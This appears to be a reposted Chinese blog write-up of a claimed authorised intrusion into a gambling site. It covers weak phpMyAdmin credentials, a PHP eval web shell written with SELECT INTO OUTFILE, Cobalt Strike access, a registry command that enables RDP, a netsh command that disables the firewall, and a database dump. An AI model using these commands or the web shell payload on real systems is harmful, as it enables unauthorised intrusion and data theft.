关于一次弱口令的BC渗透

  • A+
所属分类:安全文章

关于一次弱口令的BC渗透

因为某种原因,接手了一个授权的bc站。
内心是拒绝的,但是没办法,硬着头皮收下了。
其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了
但像我这种dd,只敢远观。
打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。

关于一次弱口令的BC渗透



简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针

关于一次弱口令的BC渗透


见到后台,废话不多说,直接弱口令套餐来一份
得到的结果肯定是  密码错误X1   密码错误X2   密码错误X3…………  
算了,不浪费时间了,看一下探针~  根据探针,得知网站的根目录。底下有phpmyadmin的连接测试

关于一次弱口令的BC渗透



直接弱口令再来一套,root  root    密码错误
Root 123456  密码错  唉   不对  好像是连接成功了

关于一次弱口令的BC渗透


激动的留下了眼泪
根据探针,得知phpmyadmin的后台地址

关于一次弱口令的BC渗透


Root 123456 
登录 

关于一次弱口令的BC渗透


Phpmyadmin进来了,网站根目录也知道了,那还唠啥了,直接拿shell了
直接执行sql语句
select'<?php @eval($_POST

下载密码:发表评论并刷新可见!
);?>' into outfile 'D:/xxx/xxx/xxx.php'

关于一次弱口令的BC渗透


一句话连接上,
Whoami  system …………  没意思啊,提权都不用了

关于一次弱口令的BC渗透


通过查看服务器文件,得知后台登陆密码,登陆后台

关于一次弱口令的BC渗透


因为个人喜好,比较喜欢用cs,powshell上线
读了一下密码,直接远程连接 

关于一次弱口令的BC渗透


但是

关于一次弱口令的BC渗透


netstat -an  ,没开3389

关于一次弱口令的BC渗透


开启3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

但是连接了一下,还是不行,用nmap扫描了一下端口,只有80端口开放
应该是开着防火墙
netsh firewall set opmode mode=disable  关闭防火墙

关于一次弱口令的BC渗透


再连接3389   连接成功

关于一次弱口令的BC渗透



根据浏览器历史记录,又发现另一个网站后台

关于一次弱口令的BC渗透


到现在其实没啥了,直接数据库打包~完活上交。
大佬勿喷~关于一次弱口令的BC渗透 


关于一次弱口令的BC渗透

本文始发于微信公众号(T00ls):关于一次弱口令的BC渗透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: